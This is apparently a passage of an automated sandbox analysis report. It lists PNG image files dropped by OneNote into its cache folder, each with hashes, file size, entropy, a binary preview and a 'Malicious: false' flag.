SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
